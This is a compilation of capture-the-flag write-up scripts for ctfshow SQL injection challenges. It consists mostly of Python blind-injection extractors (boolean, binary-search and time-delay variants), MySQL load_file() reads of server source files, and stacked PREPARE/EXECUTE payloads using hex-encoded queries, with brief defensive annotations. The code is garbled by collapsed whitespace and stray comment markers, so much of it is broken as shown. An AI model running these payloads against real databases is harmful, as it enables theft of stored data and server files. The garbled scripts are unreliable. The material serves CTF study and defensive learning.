1' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,1,'A'),2,'B'),3,'C'),4,'D'),5,'E'),6,'F'),7,'G'),8,'H'),9,'I'),0,'J'),'b' from ctfshow_user4 where username='flag' %23
# Boolean-based blind probe against the "select-waf" challenge endpoint.
# Each request injects through the `tableName` field:
#   ctfshow_user group by pass having pass like 0x<hex>
# where <hex> = tohex(flag + s + '%'); hex-encoding the candidate prefix keeps
# quote characters out of the payload. The alphabet `dicts` is lowercase
# alphanumerics plus '-' and '}', and `flag` is seeded with 'ctfshow{'.
# Oracle: the substring '$user_count = 1' in the response means the LIKE prefix
# matched, so `s` is appended to `flag` and the next position is probed (max 63).
# NOTE(review): whitespace was lost in extraction ("deftohex", "inrange",
# "if'$user_count = 1'in"), and whether time.sleep(0.5) sits inside the except
# branch or after the try block is not recoverable — not runnable as pasted.
# Defender's note: the root cause is a table identifier taken from the request and
# concatenated into SQL. Identifiers cannot be bound as parameters, so they must be
# allow-listed against a fixed set; in logs the probe looks like a burst of requests
# whose `tableName` differs by one trailing hex byte.
import requests import time import binascii dicts = '0123456789abcdefghijklmnopqrstuvwxyz-}' flag = 'ctfshow{' url = 'http://7d2f63f3-cdef-40f1-bb7b-c5865311ee95.challenge.ctf.show/select-waf.php' deftohex(string): return binascii.hexlify(string.encode('utf-8')).decode('utf-8') with requests.Session() as session: for i inrange(1, 64): for s in dicts: data = {'tableName': f"ctfshow_user group by pass having pass like 0x{tohex(flag + s + '%')}"} try: res = session.post(url, data=data) if'$user_count = 1'in res.text: flag += s print(f"Current flag: {flag}") break except requests.RequestException as e: print(f"Error occurred: {e}") time.sleep(0.5) print(f"Final flag: {flag}")
# Loop fragment only: `dicts`, `flag` (a list here — note flag.append / ''.join),
# `url`, `tofunc`, `requests` and `time` are all defined outside the visible text.
# Variant of the LIKE probe above that avoids both quotes and hex literals: the
# candidate prefix plus '%' is rendered as concat(tofunc(ord(c)), ...) with one
# tofunc() call per character (tofunc itself is not shown).
# Oracle is inverted relative to the previous script: absence of '$user_count = 0'
# counts as a match, after which the script sleeps 3 s before the next position.
# Inline Chinese comment 进行匹配 = "perform the match".
# NOTE(review): "inrange (1,64)" is an extraction artefact.
for i inrange (1,64): for s in dicts: payload = flag + list(s) payload.append("%") # 进行匹配 concat_payload = 'concat(' +','.join([tofunc(ord(x))for x in payload])+')' data = {'tableName':'ctfshow_user group by pass having pass like {}'.format(concat_payload)} res=requests.post(url,data=data) if res.text.find('$user_count = 0') == -1: flag.append(s) print(''.join(flag)) time.sleep(3) break
# Author yu22x's variant for the same "select-waf" endpoint.
# convert(strs) renders each character as char(true+true+...) with ord(c) trues
# summed, joined inside concat(...), so the payload contains neither quotes nor
# digits. The injected clause is
#   ctfshow_user group by pass having pass regexp(concat(...))
# with the pattern anchored as ^ctfshow{<prefix><candidate>}.
# Alphabet `s` is hex digits plus '-{}' — presumably the flag body is hex-shaped
# here (TODO confirm). Oracle: "user_count = 1" in the response; the script exits
# as soon as '}' is confirmed. Positions 1..44 are probed.
# Style note: the loop variable `s` inside convert() shadows the module-level
# alphabet `s`; it works because the alphabet is only read in the outer loop.
# NOTE(review): the whole line starts with "#author:yu22x", so as pasted it is one
# big comment; "defconvert" / "inrange" are also extraction artefacts.
#author:yu22x import requests import string url="http://8319afbf-281c-4a73-b14e-a29426d0e556.challenge.ctf.show/select-waf.php" s='0123456789abcdef-{}' defconvert(strs): t='concat(' for s in strs: t+= 'char(true'+'+true'*(ord(s)-1)+'),' return t[:-1]+")" flag='' for i inrange(1,45): print(i) for j in s: d = convert(f'^ctfshow{flag+j}') data={ 'tableName':f' ctfshow_user group by pass having pass regexp({d})' } #print(data) r=requests.post(url,data=data) #print(r.text) if("user_count = 1"in r.text): flag+=j print(flag) if j=='}': exit(0) break
load_file() 是 MySQL 中的一个函数,用于读取服务器上的文件。它能够从指定的文件路径读取文件内容,并将其作为字符串返回;该函数要求数据库账号具有 FILE 权限,且可读路径受 secure_file_priv 限制。
regexp 是 MySQL 中用于正则表达式匹配的操作符。这里用它把 load_file() 读到的文件内容与正则表达式进行匹配。
0x01
# Blind probe that reads the application's own source through the database:
# the `username` field receives
#   if(load_file('/var/www/html/api/index.php')regexp('<prefix><candidate>'),1,0)
# so the query is true when the file content matches the growing prefix
# (seeded with 'ctfshow{'). Oracle: '67e5' in the response body.
# Alphabet: digits + lowercase + '-' + '}'. Positions 1..63.
# NOTE(review): "inrange" is an extraction artefact.
# Defender's note: load_file() only works when the DB account holds the FILE
# privilege and secure_file_priv permits the path; running the web app under a
# least-privilege database user (and binding `username` as a parameter) removes
# both the read primitive and the injection point.
import requests import string dicts=string.digits+string.ascii_lowercase+"-"+"}" url = 'http://91a55175-5819-43ae-bd47-e9b866b79eeb.challenge.ctf.show/api/index.php' flag = 'ctfshow{' for i inrange(1, 64): for s in dicts: payload = 'if(load_file(\'/var/www/html/api/index.php\')regexp(\'{}\'),1,0)'.format(flag+s) res = requests.post(url, data={'username':payload, 'password':'1'}) if res.text.find('67e5') != -1: flag += s print(flag) break
# Position-by-position variant of the load_file() probe: for file offsets
# 257..316 it injects
#   if(substr(load_file('/var/www/html/api/index.php'),<i>,1)=('<x>'),1,0)
# into `username` and treats the marker "8d25" in the response as a hit.
# `flagstr` (the alphabet), `url`, `requests` and `time` are defined outside the
# visible text; 0.3 s pause between requests.
# Inline Chinese comments translate to: "this offset is where the group owner
# found the flag after a long run" and "8d25 appears in the page returned for
# username=1, see the screenshot above".
# NOTE(review): the first "#" comment swallows the rest of the collapsed line,
# and "inrange" is an extraction artefact — not runnable as pasted.
flag = "" #这个位置,是群主耗费很长时间跑出来的位置~ for i inrange(257,257+60): for x in flagstr: data={ "username":"if(substr(load_file('/var/www/html/api/index.php'),{},1)=('{}'),1,0)".format(i,x), "password":"0" } print(data) response = requests.post(url,data=data) time.sleep(0.3) # 8d25是username=1时的页面返回内容包含的,具体可以看上面的截图~ if response.text.find("8d25")>0: print("++++++++++++++++++ {} is right".format(x)) flag+=x break else: continue print(flag)
web190
where username = '{$username}'";
由于 $username 被直接拼接进 SQL 字符串,可以用 or 进行绕过并尝试注入得到 flag,还是用盲注写。
0x01
# web190, method 0x01: boolean-based blind injection through `username`.
# For position i and candidate s the field becomes
#   admin' and if(substr((select f1ag from ctfshow_fl0g),i,1)='s',1,0)#
# so the WHERE clause is true only when character i of the flag equals s.
# Oracle: '5bc6' in the response. The two commented-out payloads are the earlier
# enumeration steps (table names, then column names) via information_schema.
# Alphabet: digits + lowercase + '-' + '{}' + ',' (the comma is for group_concat
# lists). `flag` starts empty, so the whole value is recovered one confirmed
# character at a time with a 0.5 s pause after each hit; positions 1..63.
# NOTE(review): "inrange" is an extraction artefact.
# Defender's note: the server-side query for this challenge concatenates
# $username into the SQL string; a bound parameter closes the injection point,
# and information_schema references in request bodies are a cheap detection
# signal for the enumeration phase.
import requests import string import time dicts=string.digits+string.ascii_lowercase+"-"+"{}"+"," url = 'http://27c9e10a-b6cd-4bcf-86e5-5a067c06f56e.challenge.ctf.show/api/index.php' flag = ''
for i inrange(1,64): for s in dicts: #payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()' #payload = 'select group_concat(column_name) from information_schema.columns where table_name=\'ctfshow_fl0g\' and table_schema=database()' payload = 'select f1ag from ctfshow_fl0g' s_payload = 'admin\' and if(substr(({}),{},1)=\'{}\',1,0)#'.format(payload,i,s) res = requests.post(url,data={'username':s_payload,'password':'1'} ) if res.text.find('5bc6') != -1: flag += s print(flag) time.sleep(0.5) break
# web190, method 0x02: binary-search blind injection (fewer requests than the
# alphabet scan above). For each position i it injects
#   admin'and (ascii(substr((select f1ag from ctfshow_fl0g),i,1))<mid)#
# and narrows [min, max) = [32, 127): marker "8bef" present → max = mid,
# absent → min = mid. When min == mid the interval has collapsed and chr(mid) is
# the character. Commented payloads show the earlier enumeration steps
# (database(), table names, column names; results noted inline as ctfshow_web,
# ctfshow_fl0g, id,f1ag). Positions 1..59, 0.3 s pause per request.
# `requests` and `time` are imported outside the visible text.
# Style note: `max`/`min` shadow the Python builtins inside the loop.
# NOTE(review): "inrange" and "while1" are extraction artefacts; the `data = {...}`
# statement on the second line belongs inside the while loop.
url = "http://36e8713a-b1fb-49c2-badb-4c4d66f5d1cb.challenge.ctf.show/api/" flag = "" for i inrange(1,60): max = 127 min = 32 while1: mid = (max+min)>>1 if(min == mid): flag += chr(mid) print(flag) break #payload = "admin'and (ascii(substr((select database()),{},1))<{})#".format(i,mid) #ctfshow_web #payload = "admin'and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i,mid) #ctfshow_fl0g #payload = "admin'and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<{})#".format(i,mid) #id,f1ag payload = "admin'and (ascii(substr((select f1ag from ctfshow_fl0g),{},1))<{})#".format(i,mid)
data = { "username":payload, "password":0, } res = requests.post(url = url,data =data) time.sleep(0.3) if res.text.find("8bef")>0: max = mid else: min = mid
web191
本题过滤了 ascii 函数,可以继续用 web190 的 0x01 方法
0x01
# web191: same substr()-equality blind probe as web190 (only the target host
# differs). `username` receives
#   admin' and if(substr((select f1ag from ctfshow_fl0g),i,1)='s',1,0)#
# with '5bc6' in the response as the true/false oracle; commented payloads are
# the information_schema enumeration steps. Alphabet: digits + lowercase +
# '-' + '{}' + ','. Positions 1..63, 0.5 s pause after each hit.
# NOTE(review): "inrange" is an extraction artefact.
import requests import string import time dicts=string.digits+string.ascii_lowercase+"-"+"{}"+"," url = 'http://42161408-1017-4aef-83ce-c22452b3d107.challenge.ctf.show/api/index.php' flag = ''
for i inrange(1,64): for s in dicts: #payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()' #payload = 'select group_concat(column_name) from information_schema.columns where table_name=\'ctfshow_fl0g\' and table_schema=database()' payload = 'select f1ag from ctfshow_fl0g' s_payload = 'admin\' and if(substr(({}),{},1)=\'{}\',1,0)#'.format(payload,i,s) res = requests.post(url,data={'username':s_payload,'password':'1'} ) if res.text.find('5bc6') != -1: flag += s print(flag) time.sleep(0.5) break
# web191, binary-search variant: identical to the web190 0x02 script except that
# ascii() is replaced by ord() (the challenge filters "ascii", per the note
# above). Injected condition:
#   admin'and (ord(substr((select f1ag from ctfshow_fl0g),i,1))<mid)#
# Search window [32, 127); "8bef" present → max = mid, absent → min = mid;
# chr(mid) is appended once min == mid. Positions 1..59, 0.3 s pause.
# `requests` and `time` come from outside the visible text.
# NOTE(review): "inrange"/"while1" are extraction artefacts; the `data = {...}`
# line belongs inside the while loop.
url = "http://60a3f535-f0c5-40d6-9e63-fe058bf95762.challenge.ctf.show/api/" flag = "" for i inrange(1,60): max = 127 min = 32 while1: mid = (max+min)>>1 if(min == mid): flag += chr(mid) print(flag) break #payload = "admin'and (ord(substr((select database()),{},1))<{})#".format(i,mid) #ctfshow_web #payload = "admin'and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i,mid) #ctfshow_fl0g #payload = "admin'and (ord(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<{})#".format(i,mid) #id,f1ag payload = "admin'and (ord(substr((select f1ag from ctfshow_fl0g),{},1))<{})#".format(i,mid)
data = { "username":payload, "password":0, } res = requests.post(url = url,data =data) time.sleep(0.3) if res.text.find("8bef")>0: max = mid else: min = mid
web192
本题多过滤了ord和hex函数,还是可以继续用上面的脚本
# web192: the web190 substr()-equality probe reused unchanged (ord/hex are
# filtered here but this script never used them). Oracle '5bc6'; alphabet
# digits + lowercase + '-' + '{}' + ','; positions 1..63; 0.5 s pause per hit.
# NOTE(review): "inrange" is an extraction artefact.
import requests import string import time dicts=string.digits+string.ascii_lowercase+"-"+"{}"+"," url = 'http://6fec3a09-c862-4062-9893-f46b784267f2.challenge.ctf.show/api/index.php' flag = ''
for i inrange(1,64): for s in dicts: #payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()' #payload = 'select group_concat(column_name) from information_schema.columns where table_name=\'ctfshow_fl0g\' and table_schema=database()' payload = 'select f1ag from ctfshow_fl0g' s_payload = 'admin\' and if(substr(({}),{},1)=\'{}\',1,0)#'.format(payload,i,s) res = requests.post(url,data={'username':s_payload,'password':'1'} ) if res.text.find('5bc6') != -1: flag += s print(flag) time.sleep(0.5) break
# Same boolean probe with mid() in place of substr() and a different target
# table/column (ctfshow_flxg / f1ag):
#   admin' and if(mid((select f1ag from ctfshow_flxg),i,1)='s',1,0)#
# Oracle '5bc6'; alphabet digits + lowercase + '-' + '{}' + ','; positions
# 1..63; 0.5 s pause per hit. Note the doubled slash in the URL path ("//api").
# NOTE(review): "inrange" is an extraction artefact.
import requests import string import time dicts=string.digits+string.ascii_lowercase+"-"+"{}"+"," url = 'http://8a35e846-e2ed-464b-9843-19e404a9158d.challenge.ctf.show//api/index.php' flag = ''
for i inrange(1,64): for s in dicts: #payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()' #payload = 'select group_concat(column_name) from information_schema.columns where table_name=\'ctfshow_flxg\' and table_schema=database()' payload = 'select f1ag from ctfshow_flxg' s_payload = 'admin\' and if(mid(({}),{},1)=\'{}\',1,0)#'.format(payload,i,s) res = requests.post(url,data={'username':s_payload,'password':'1'} ) if res.text.find('5bc6') != -1: flag += s print(flag) time.sleep(0.5) break
web194
多过滤了char|left|right|substring这些,上题的脚本继续用
# web194: the mid()-based probe from the previous challenge reused as-is
# (char/left/right/substring are filtered, mid() is not). Target
# ctfshow_flxg / f1ag, oracle '5bc6', alphabet digits + lowercase + '-' + '{}'
# + ',', positions 1..63, 0.5 s pause per hit.
# NOTE(review): "inrange" is an extraction artefact.
import requests import string import time dicts=string.digits+string.ascii_lowercase+"-"+"{}"+"," url = 'http://5d33d7d6-6708-4e4a-82ed-38708c8d1276.challenge.ctf.show//api/index.php' flag = ''
for i inrange(1,64): for s in dicts: #payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()' #payload = 'select group_concat(column_name) from information_schema.columns where table_name=\'ctfshow_flxg\' and table_schema=database()' payload = 'select f1ag from ctfshow_flxg' s_payload = 'admin\' and if(mid(({}),{},1)=\'{}\',1,0)#'.format(payload,i,s) res = requests.post(url,data={'username':s_payload,'password':'1'} ) if res.text.find('5bc6') != -1: flag += s print(flag) time.sleep(0.5) break
# Time-based blind injection through the `ip` field (POST, debug=1). No quote
# breakout is used — the value is injected as a bare expression:
#   if(substr((select flaga from ctfshow_flagx),index,1)='<char>',sleep(0.5),0)
# get_flag_char(index) walks `dicts`, times each request and returns the first
# char whose response took >= 0.5 s; None when the alphabet is exhausted.
# The driver appends each returned char to `flag` and stops at the first None.
# Commented payloads are the information_schema enumeration steps.
# Inline Chinese text: 构造完整请求 URL = "build the full request URL";
# 请求失败 = "request failed"; 当前 情况 / 最终 情况 = "current / final state";
# 已结束 = "finished". `r` and `sub` are assigned but never read.
# NOTE(review): "defget_flag_char", "inrange", "returnNone" are extraction
# artefacts, and the third line begins with "#", which comments out the whole
# try/except as pasted.
# Defender's note: time-based probing shows up as a run of requests to one
# endpoint whose latency clusters at the injected delay; binding `ip` as a
# parameter (or validating it as an address) removes the injection point.
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://9a47d60c-a58c-473d-8fda-bcd4534a6d2a.challenge.ctf.show/api/'
defget_flag_char(index): for char in dicts: #payload = {"ip":f"if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(0.5),0)",'debug':1} #payload = {"ip":f"if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{index},1)='{char}',sleep(0.5),0)",'debug':1} payload = {"ip":f"if(substr((select flaga from ctfshow_flagx),{index},1)='{char}',sleep(0.5),0)",'debug':1}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=0.5: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
# Time-based blind injection, string context: `ip` is closed with a quote and
# the comparison is OR'ed in —
#   0' or if(substr((select flagaa from ctfshow_flagxc),index,1)='<char>',sleep(1),0)#
# A response taking >= 1 s marks the character; get_flag_char returns it, or None
# once `dicts` is exhausted, and the driver loop stops at the first None.
# Commented payloads are the information_schema enumeration steps.
# Inline Chinese text: 构造完整请求 URL = "build the full request URL";
# 请求失败 = "request failed"; 当前 情况 / 最终 情况 = "current / final state";
# 已结束 = "finished". `r` and `sub` are assigned but never read.
# NOTE(review): "defget_flag_char", "inrange", "returnNone" are extraction
# artefacts; the fourth line starts with "#" and comments out the try/except.
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://fcff0b3a-2480-4088-88e3-4a8554259ae8.challenge.ctf.show/api/index.php'
defget_flag_char(index): for char in dicts:
#payload = {'debug':'1',"ip":f"0' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(1),0)#"} #payload = {'debug':'1',"ip":f"0' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{index},1)='{char}',sleep(1),0)#"} payload = {'debug':'1',"ip":f"0' or if(substr((select flagaa from ctfshow_flagxc),{index},1)='{char}',sleep(1),0)#"}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=1: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
# Time-based blind injection, parenthesised context: the `ip` value closes an
# opening bracket before the OR —
#   0) or if(substr((select flagaac from ctfshow_flagxcc),index,1)='<char>',sleep(1),0)#
# Otherwise identical to the previous script: >= 1 s response marks the char,
# get_flag_char returns None when `dicts` is exhausted, driver stops on None.
# Inline Chinese text: 构造完整请求 URL = "build the full request URL";
# 请求失败 = "request failed"; 当前 情况 / 最终 情况 = "current / final state";
# 已结束 = "finished". `r` and `sub` are assigned but never read.
# NOTE(review): "defget_flag_char", "inrange", "returnNone" are extraction
# artefacts; the fourth line starts with "#" and comments out the try/except.
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://8184624f-3ac4-4ac2-b195-865a82d8cb94.challenge.ctf.show/api/index.php'
defget_flag_char(index): for char in dicts:
#payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(1),0)#"} #payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxcc'),{index},1)='{char}',sleep(1),0)#"} payload = {'debug':'1',"ip":f"0) or if(substr((select flagaac from ctfshow_flagxcc),{index},1)='{char}',sleep(1),0)#"}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=1: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
# Time-based blind injection with BENCHMARK(1000000, MD5('orange')) as the delay
# primitive instead of sleep() (presumably because sleep is filtered here —
# TODO confirm). Injected via `ip`:
#   0) or if(substr((select flagaabc from ctfshow_flagxccb),index,1)='<char>',BENCHMARK(...),0)#
# A response taking >= 0.5 s marks the char; otherwise as in the scripts above.
# Inline Chinese text: 构造完整请求 URL = "build the full request URL";
# 请求失败 = "request failed"; 当前 情况 / 最终 情况 = "current / final state";
# 已结束 = "finished". `r` and `sub` are assigned but never read.
# NOTE(review): "defget_flag_char", "inrange", "returnNone" are extraction
# artefacts; the fourth line starts with "#" and comments out the try/except.
# Defender's note: CPU-burning primitives like BENCHMARK are visible as database
# CPU spikes correlated with single web requests, not just as latency.
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://078b3b8c-d67e-4948-b1f2-239e5176f712.challenge.ctf.show/api/index.php'
defget_flag_char(index): for char in dicts:
#payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',BENCHMARK(1000000, MD5('orange')),0)#"} #payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxccb'),{index},1)='{char}',BENCHMARK(1000000, MD5('orange')),0)#"} payload = {'debug':'1',"ip":f"0) or if(substr((select flagaabc from ctfshow_flagxccb),{index},1)='{char}',BENCHMARK(1000000, MD5('orange')),0)#"}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=0.5: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
# Time-based blind injection using a heavy cartesian self-join of
# information_schema.columns as the delay primitive (no sleep/BENCHMARK):
#   0) or if(substr((select flagaac from ctfshow_flagxc),index,1)='<char>',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0)#
# A response taking >= 0.3 s marks the char; the driver is unchanged from the
# scripts above (append on hit, stop on None).
# Inline Chinese text: 构造完整请求 URL = "build the full request URL";
# 请求失败 = "request failed"; 当前 情况 / 最终 情况 = "current / final state";
# 已结束 = "finished". `r` and `sub` are assigned but never read.
# NOTE(review): "defget_flag_char", "inrange", "returnNone" are extraction
# artefacts; the fourth line starts with "#" and comments out the try/except.
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://380bc0f7-937d-4516-a20e-aaa284e086a2.challenge.ctf.show/api/index.php'
defget_flag_char(index): for char in dicts:
#payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B), 0)#"} #payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{index},1)='{char}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0)#"} payload = {'debug':'1',"ip":f"0) or if(substr((select flagaac from ctfshow_flagxc),{index},1)='{char}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0)#"}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=0.3: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
# Same cartesian-join delay probe as the previous script, retargeted at
# ctfshow_flagxca / flagaabc, with the latency threshold lowered to 0.2 s.
# Note the doubled slash in the URL path ("//api").
# Inline Chinese text: 构造完整请求 URL = "build the full request URL";
# 请求失败 = "request failed"; 当前 情况 / 最终 情况 = "current / final state";
# 已结束 = "finished". `r` and `sub` are assigned but never read.
# NOTE(review): "defget_flag_char", "inrange", "returnNone" are extraction
# artefacts; the fourth line starts with "#" and comments out the try/except.
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://eca68551-e138-419b-a9f7-8bff2348458d.challenge.ctf.show//api/index.php'
defget_flag_char(index): for char in dicts:
#payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B), 0)#"} #payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxca'),{index},1)='{char}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0)#"} payload = {'debug':'1',"ip":f"0) or if(substr((select flagaabc from ctfshow_flagxca),{index},1)='{char}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0)#"}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=0.2: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
# Cartesian-join delay probe using left()+regexp instead of substr()=:
#   0) or if(left((select flagaabcc from ctfshow_flagxcac),index)regexp('<flag+char>'),<heavy count>,0)#
# i.e. the first `index` characters of the column are matched against the
# accumulated prefix plus the candidate. Threshold 0.2 s. Note the commented
# enumeration payloads use debug='0' and `limit 0,1` / `limit 1,1` to pick a
# single name, whereas the live payload uses debug='1'.
# Inline Chinese text: 构造完整请求 URL = "build the full request URL";
# 请求失败 = "request failed"; 当前 情况 / 最终 情况 = "current / final state";
# 已结束 = "finished". `r` and `sub` are assigned but never read.
# NOTE(review): "defget_flag_char", "inrange", "returnNone" are extraction
# artefacts; the fourth line starts with "#" and comments out the try/except.
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://581c4aa9-8e30-4f3e-9253-216e7c43703a.challenge.ctf.show/api/index.php'
defget_flag_char(index): for char in dicts:
#payload = {'debug':'0', "ip": f"0) or if(left((select table_name from information_schema.tables where table_schema=database() limit 0, 1),{index})regexp('{flag+char}'),(SELECT count(*) FROM information_schema.columns A, information_schema.columns B), 0)#"} #payload = {'debug':'0', "ip": f"0) or if(left((select column_name from information_schema.columns where table_name='ctfshow_flagxcac' limit 1, 1),{index})regexp('{flag+char}'),(SELECT count(*) FROM information_schema.columns A, information_schema.columns B), 0)#"} payload = {'debug':'1',"ip":f"0) or if(left((select flagaabcc from ctfshow_flagxcac),{index})regexp('{flag+char}'),(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0)#"}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=0.2: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
到这边盲注就结束了,略感疲惫。
web221
limit注入
$sql = select * from ctfshow_user limit ($page-1)*$limit,$limit;
# web221 (limit injection), author Y4tacker. The injection point is the `u`
# GET parameter; digits are avoided by writing every number as a sum of trues:
# generateNum(n) returns 'true' for n == 1 and 'true+true+...' (n terms) otherwise.
# Per position i a binary search over [32, 127) evaluates
#   if(ascii(substr((select flagasabc from ctfshow_flagas),i,1))>mid,username,'a')
# — "userAUTO" in the response is taken as "condition true" → head = mid + 1,
# otherwise tail = mid. When the search ends, head is the character code;
# head == 32 (nothing matched) terminates the outer loop.
# Inline Chinese comments: 查数据库-ctfshow_flagas = "look up the table —
# ctfshow_flagas"; 查字段-flagasabc = "look up the column — flagasabc";
# 查flag = "look up the flag".
# NOTE(review): "defgenerateNum", "inrange", "while1", 'if"userAUTO"in' are
# extraction artefacts.
# Defender's note: LIMIT operands cannot be bound in every driver, so `page` and
# `limit` must be cast to integers before being placed in the statement.
""" Author:Y4tacker """ import requests defgenerateNum(num): res = 'true' if num == 1: return res else: for i inrange(num - 1): res += "+true" return res
url = "http://f1d0f6ad-cd9f-432a-885f-42f4c6f20289.challenge.ctf.show/api/" i = 0 res = "" while1: head = 32 tail = 127 i = i + 1
while head < tail: mid = (head + tail) >> 1 # 查数据库-ctfshow_flagas #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()" # 查字段-flagasabc #payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'" # 查flag payload = "select flagasabc from ctfshow_flagas" params = { "u": f"if(ascii(substr(({payload}),{generateNum(i)},{generateNum(1)}))>{generateNum(mid)},username,'a')" } r = requests.get(url, params=params) # print(r.json()['data']) if"userAUTO"in r.text: head = mid + 1 else: tail = mid if head != 32: res += chr(head) else: break print(res)
?username=0'; PREPARE 0raN9e FROM concat('selec',"t group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagasa'"); EXECUTE 0raN9e;
?username=0'; PREPARE 0raN9e FROM concat('selec','t flagas from ctfshow_flagasa'); EXECUTE 0raN9e;
?username=-1';PREPARE 0raN9e from 0x73656c65637420646174616261736528293b;EXECUTE 0raN9e;
?username=-1';PREPARE 0raN9e from 0x73656C6563742067726F75705F636F6E636174287461626C655F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D613D2763746673686F775F77656227;EXECUTE 0raN9e;
?username=-1';PREPARE 0raN9e from 0x73656C6563742067726F75705F636F6E63617428636F6C756D6E5F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D2763746673685F6F775F666C6167617327;EXECUTE 0raN9e;
?username=-1';PREPARE 0raN9e from 0x73656C65637420666C61676173622066726F6D2063746673685F6F775F666C61676173;EXECUTE 0raN9e;
web227
尝试用上题的预处理方法翻遍了也没找到,看看 wp 吧
0x01
0x01 没什么意义,主要看 0x02
?username=1';call getFlag();
0x02
参考文章中提到,可以通过 information_schema.Routines 查看存储过程和函数的信息:SELECT * FROM information_schema.Routines
?username=-1';PREPARE 0raN9e from 0x53454C45435420202A202046524F4D2020696E666F726D6174696F6E5F736368656D612E526F7574696E6573;EXECUTE 0raN9e;
web228
